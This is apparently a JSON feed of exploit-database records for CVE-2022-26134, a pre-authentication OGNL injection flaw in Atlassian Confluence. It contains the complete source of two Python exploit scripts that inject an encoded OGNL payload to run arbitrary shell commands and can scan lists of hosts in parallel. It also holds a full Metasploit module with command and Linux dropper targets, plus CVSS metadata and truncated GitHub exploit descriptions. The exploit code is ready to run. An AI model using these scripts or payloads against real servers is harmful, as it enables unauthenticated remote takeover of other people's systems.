"PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-06-10T00:00:00", "id": "1337DAY-ID-37783", "href": "https://0day.today/exploit/description/37783", "sourceData": "# Exploit Title: Confluence Data Center 7.18.0 - Remote Code Execution (RCE)\n# Exploit Author: h3v0x\n# Vendor Homepage: https://www.atlassian.com/\n# Software Link: https://www.atlassian.com/software/confluence/download-archives\n# Version: All < 7.4.17 versions before 7.18.1\n# Tested on: -\n# CVE : CVE-2022-26134\n# https://github.com/h3v0x/CVE-2022-26134\n\n#!/usr/bin/python3\n\nimport sys\nimport requests\nimport optparse\nimport multiprocessing\n\nfrom requests.packages import urllib3\nfrom requests.exceptions import MissingSchema, InvalidURL\nurllib3.disable_warnings()\n\nrequestEngine = multiprocessing.Manager()\nsession = requests.Session()\n\nglobal paramResults\nparamResults = requestEngine.list()\nglobals().update(locals())\n\ndef spiderXpl(url):\n globals().update(locals())\n if not url.startswith('http'):\n url='http://'+url\n \n headers = {\"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36\",\n \"Connection\": \"close\",\n \"Accept-Encoding\": \"gzip, deflate\"}\n\n try:\n response = requests.get(url + '/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22'+optionsOpt.command+'%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/', headers=headers, verify=False, allow_redirects=False)\n if(response.status_code == 302):\n print('Found: '+url+' // '+ response.headers['X-Cmd-Response'])\n\n inputBuffer = str(response.headers['X-Cmd-Response'])\n paramResults.append('Vulnerable application found:'+url+'\\n''Command result:'+inputBuffer+'\\n')\n else:\n pass\n\n except requests.exceptions.ConnectionError:\n print('[x] Failed to Connect: '+url)\n pass\n except multiprocessing.log_to_stderr:\n pass\n except KeyboardInterrupt:\n print('[!] Stoping exploit...')\n exit(0)\n except (MissingSchema, InvalidURL):\n pass\n \n \ndef banner():\n print('[-] CVE-2022-26134')\n print('[-] Confluence Pre-Auth Remote Code Execution via OGNL Injection \\n')\n\n \ndef main():\n banner()\n \n globals().update(locals())\n \n sys.setrecursionlimit(100000)\n\n if not optionsOpt.filehosts:\n url = optionsOpt.url\n spiderXpl(url)\n else:\n f = open(optionsOpt.filehosts)\n urls = map(str.strip, f.readlines())\n\n multiReq = multiprocessing.Pool(optionsOpt.threads_set)\n try:\n multiReq.map(spiderXpl, urls)\n multiReq.close()\n multiReq.join()\n except UnboundLocalError:\n pass\n except KeyboardInterrupt:\n exit(0)\n\n\n if optionsOpt.output:\n print(\"\\n[!] Saving the output result in: %s\" % optionsOpt.output)\n\n with open(optionsOpt.output, \"w\") as f:\n for result in paramResults:\n f.write(\"%s\\n\" % result)\n f.close()\n\nif __name__ == \"__main__\":\n parser = optparse.OptionParser()\n\n parser.add_option('-u', '--url', action=\"store\", dest=\"url\", help='Base target uri (ex. http://target-uri/)')\n parser.add_option('-f', '--file', dest=\"filehosts\", help='example.txt')\n parser.add_option('-t', '--threads', dest=\"threads_set\", type=int,default=10)\n parser.add_option('-m', '--maxtimeout', dest=\"timeout\", type=int,default=8)\n parser.add_option('-o', '--output', dest=\"output\", type=str, default='exploit_result.txt')\n parser.add_option('-c', '--cmd', dest=\"command\", type=str, default='id')\n optionsOpt, args = parser.parse_args()\n\n main()\n", "sourceHref": "https://0day.today/exploit/37783", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-06-14T17:00:13", "description": "Confluence suffers from a pre-authentication remote code execution vulnerability that is leveraged via OGNL injection. All 7.4.17 versions before 7.18.1 are affected.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-07T00:00:00", "type": "zdt", "title": "Confluence OGNL Injection Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-06-07T00:00:00", "id": "1337DAY-ID-37778", "href": "https://0day.today/exploit/description/37778", "sourceData": "#!/usr/bin/python3\n\n# Exploit Title: Confluence Pre-Auth Remote Code Execution via OGNL Injection\n# Google Dork: N/A\n# Date: 06/006/2022\n# Exploit Author: h3v0x\n# Vendor Homepage: https://www.atlassian.com/\n# Software Link: https://www.atlassian.com/software/confluence/download-archives\n# Version: All < 7.4.17 versions before 7.18.1\n# Tested on: -\n# CVE : CVE-2022-26134\n# https://github.com/h3v0x/CVE-2022-26134\n\nimport sys\nimport requests\nimport optparse\nimport multiprocessing\n\nfrom requests.packages import urllib3\nfrom requests.exceptions import MissingSchema, InvalidURL\nurllib3.disable_warnings()\n\nrequestEngine = multiprocessing.Manager()\nsession = requests.Session()\n\nglobal paramResults\nparamResults = requestEngine.list()\nglobals().update(locals())\n\ndef spiderXpl(url):\n globals().update(locals())\n if not url.startswith('http'):\n url='http://'+url\n \n headers = {\"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36\",\n \"Connection\": \"close\",\n \"Accept-Encoding\": \"gzip, deflate\"}\n\n try:\n response = requests.get(url + '/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22'+optionsOpt.command+'%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/', headers=headers, verify=False, allow_redirects=False)\n if(response.status_code == 302):\n print('Found: '+url+' // '+ response.headers['X-Cmd-Response'])\n\n inputBuffer = str(response.headers['X-Cmd-Response'])\n paramResults.append('Vulnerable application found:'+url+'\\n''Command result:'+inputBuffer+'\\n')\n else:\n pass\n\n except requests.exceptions.ConnectionError:\n print('[x] Failed to Connect: '+url)\n pass\n except multiprocessing.log_to_stderr:\n pass\n except KeyboardInterrupt:\n print('[!] Stoping exploit...')\n exit(0)\n except (MissingSchema, InvalidURL):\n pass\n \n \ndef banner():\n print('[-] CVE-2022-26134')\n print('[-] Confluence Pre-Auth Remote Code Execution via OGNL Injection \\n')\n\n \ndef main():\n banner()\n \n globals().update(locals())\n \n sys.setrecursionlimit(100000)\n\n if not optionsOpt.filehosts:\n url = optionsOpt.url\n spiderXpl(url)\n else:\n f = open(optionsOpt.filehosts)\n urls = map(str.strip, f.readlines())\n\n multiReq = multiprocessing.Pool(optionsOpt.threads_set)\n try:\n multiReq.map(spiderXpl, urls)\n multiReq.close()\n multiReq.join()\n except UnboundLocalError:\n pass\n except KeyboardInterrupt:\n exit(0)\n\n\n if optionsOpt.output:\n print(\"\\n[!] Saving the output result in: %s\" % optionsOpt.output)\n\n with open(optionsOpt.output, \"w\") as f:\n for result in paramResults:\n f.write(\"%s\\n\" % result)\n f.close()\n\nif __name__ == \"__main__\":\n parser = optparse.OptionParser()\n\n parser.add_option('-u', '--url', action=\"store\", dest=\"url\", help='Base target uri (ex. http://target-uri/)')\n parser.add_option('-f', '--file', dest=\"filehosts\", help='example.txt')\n parser.add_option('-t', '--threads', dest=\"threads_set\", type=int,default=10)\n parser.add_option('-m', '--maxtimeout', dest=\"timeout\", type=int,default=8)\n parser.add_option('-o', '--output', dest=\"output\", type=str, default='exploit_result.txt')\n parser.add_option('-c', '--cmd', dest=\"command\", type=str, default='id')\n optionsOpt, args = parser.parse_args()\n\n main()\n", "sourceHref": "https://0day.today/exploit/37778", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-06-09T08:00:58", "description": "This Metasploit module exploits an OGNL injection in Atlassian Confluence servers. A specially crafted URI can be used to evaluate an OGNL expression resulting in OS command execution.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-09T00:00:00", "type": "zdt", "title": "Atlassian Confluence Namespace OGNL Injection Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084", "CVE-2022-26134"], "modified": "2022-06-09T00:00:00", "id": "1337DAY-ID-37781", "href": "https://0day.today/exploit/description/37781", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n Rank = ExcellentRanking\n\n prepend Msf::Exploit::Remote::AutoCheck\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::CmdStager\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Atlassian Confluence Namespace OGNL Injection',\n 'Description' => %q{\n This module exploits an OGNL injection in Atlassian Confluence servers. A specially crafted URI can be used to\n evaluate an OGNL expression resulting in OS command execution.\n },\n 'Author' => [\n 'Unknown', # exploited in the wild\n 'bturner-r7',\n 'jbaines-r7',\n 'Spencer McIntyre'\n ],\n 'References' => [\n ['CVE', '2021-26084'],\n ['URL', 'https://jira.atlassian.com/browse/CONFSERVER-79000?src=confmacro'],\n ['URL', 'https://gist.githubusercontent.com/bturner-r7/1d0b62fac85235b94f1c95cc4c03fcf3/raw/478e53b6f68b5150eefd53e0956f23d53618d250/confluence-exploit.py'],\n ['URL', 'https://github.com/jbaines-r7/through_the_wire'],\n ['URL', 'https://attackerkb.com/topics/BH1D56ZEhs/cve-2022-26134/rapid7-analysis']\n ],\n 'DisclosureDate' => '2022-06-02',\n 'License' => MSF_LICENSE,\n 'Platform' => ['unix', 'linux'],\n 'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],\n 'Privileged' => false,\n 'Targets' => [\n [\n 'Unix Command',\n {\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Type' => :cmd\n }\n ],\n [\n 'Linux Dropper',\n {\n 'Platform' => 'linux',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Type' => :dropper\n }\n ]\n ],\n 'DefaultTarget' => 0,\n 'DefaultOptions' => {\n 'RPORT' => 8090\n },\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]\n }\n )\n )\n\n register_options([\n OptString.new('TARGETURI', [true, 'Base path', '/'])\n ])\n end\n\n def check\n version = get_confluence_version\n return CheckCode::Unknown unless version\n\n vprint_status(\"Detected Confluence version: #{version}\")\n header = \"X-#{Rex::Text.rand_text_alphanumeric(10..15)}\"\n res = inject_ognl('', header: header) # empty command works for testing, the header will be set\n\n return CheckCode::Unknown unless res\n\n unless res && res.headers.include?(header)\n return CheckCode::Safe('Failed to test OGNL injection.')\n end\n\n CheckCode::Vulnerable('Successfully tested OGNL injection.')\n end\n\n def get_confluence_version\n return @confluence_version if @confluence_version\n\n res = send_request_cgi(\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri.path, 'login.action')\n )\n return nil unless res&.code == 200\n\n poweredby = res.get_xml_document.xpath('//ul[@id=\"poweredby\"]/li[@class=\"print-only\"]/text()').first&.text\n return nil unless poweredby =~ /Confluence (\\d+(\\.\\d+)*)/\n\n @confluence_version = Rex::Version.new(Regexp.last_match(1))\n @confluence_version\n end\n\n def exploit\n print_status(\"Executing #{payload_instance.refname} (#{target.name})\")\n\n case target['Type']\n when :cmd\n execute_command(payload.encoded)\n when :dropper\n execute_cmdstager\n end\n end\n\n def execute_command(cmd, _opts = {})\n header = \"X-#{Rex::Text.rand_text_alphanumeric(10..15)}\"\n res = inject_ognl(cmd, header: header)\n\n unless res && res.headers.include?(header)\n fail_with(Failure::PayloadFailed, \"Failed to execute command: #{cmd}\")\n end\n\n vprint_good(\"Successfully executed command: #{cmd}\")\n res.headers[header]\n end\n\n def inject_ognl(cmd, header:)\n send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, Rex::Text.uri_encode(ognl_payload(cmd, header: header)), 'dashboard.action'),\n 'headers' => { header => cmd }\n )\n end\n\n def ognl_payload(_cmd, header:)\n <<~OGNL.gsub(/^\\s+/, '').tr(\"\\n\", '')\n ${\n Class.forName(\"com.opensymphony.webwork.ServletActionContext\")\n .getMethod(\"getResponse\",null)\n .invoke(null,null)\n .setHeader(\"#{header}\",\n Class.forName(\"javax.script.ScriptEngineManager\")\n .newInstance()\n .getEngineByName(\"js\")\n .eval(\"java.lang.Runtime.getRuntime().exec([\n #{target['Platform'] == 'win' ? \"'cmd.exe','/c'\" : \"'/bin/sh','-c'\"},\n com.opensymphony.webwork.ServletActionContext.getRequest().getHeader('#{header}')\n ]); '#{Faker::Internet.uuid}'\")\n )\n }\n OGNL\n end\nend\n", "sourceHref": "https://0day.today/exploit/37781", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "githubexploit": [{"lastseen": "2022-06-14T20:01:10", "description": "# Confluence-CVE-2022-26134\n...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-05T13:51:39", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Data Center", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-06-06T01:29:57", "id": "AB8EAC0D-269A-5799-885F-B0EA2A33792C", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-11T23:05:16", "description": "## This is a Script to find vulnerable servers to CVE-2022-26134...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-07-12T05:34:09", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Data Center", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-08-11T19:08:14", "id": "F42BF447-C1A3-5795-8343-D71F096AFF52", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-18T20:09:36", "description": "# Confluence RCE [CVE-2022-26134] Exploit Detection\n\n## Pre-requ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-03T13:52:14", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Data Center", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-06-07T09:11:48", "id": "26F41B84-2AAF-5C6C-BE06-461FF65C6D03", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-19T20:06:40", "description": "# CVE-2022-26134\nImplementation of CVE-2022-26134\n\nThis reposito...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-07T08:58:07", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Data Center", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-06-07T09:21:42", "id": "1A808CE9-B43C-50A7-A06E-75B3C5A7D5AC", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-20T08:09:12", "description": "CVE-2022-26134 poc\r\n\r\n\u58f0\u660e:\u8be5POC\u4ec5\u4f9b\u4e8e\u5b66\u4e60\u4e13\u7528\uff0c\u7981\u6b62\u4e00\u5207\u8fdd\u6cd5\u64cd\u4f5c\uff0c\u5982\u679c\u8fdb\u884c\u6076\u610f...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-05T13:41:25", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Data Center", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-06-05T13:44:25", "id": "53CC55D8-983C-5FA9-AE81-D20750A6612E", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-29T17:23:14", "description": "# Exploit for CVE-2022-26134: Confluence Pre-Auth Remote Code Ex...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-07T11:17:25", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Data Center", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-07-29T16:55:14", "id": "0E5BE237-A243-54B8-9AD7-92FBA10D1FA2", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-06-30T05:01:42", "description": "# CVE-2022-26134\nAtlassian Conflue...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-07T06:57:02", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Data Center", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-06-07T14:41:51", "id": "18A205C9-C2EE-55CC-9BFD-4054390F94E9", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-18T02:16:33", "description": "### CVE-2022-26134 - OGNL injection vulnerability:\r\n\r\nScript pro...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-07-05T07:04:50", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Data Center", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-07-10T08:52:10", "id": "DBAD59E8-9E48-5D54-92A0-AAD5B57C39F6", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-09-22T20:51:13", "description": "# POC - Atlassian Confluence OGNL Injection Remote Code Executio...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-24T10:33:13", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Data Center", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-06-27T22:50:35", "id": "20BFC1D4-CB1E-51CF-82D8-E4258142BB69", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-09-22T20:45:35", "description": "# CVE-2022-26134 by 1vere$k\nJust simple PoC for the Atlassian Ji...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-07-15T10:06:15", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Data Center", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, 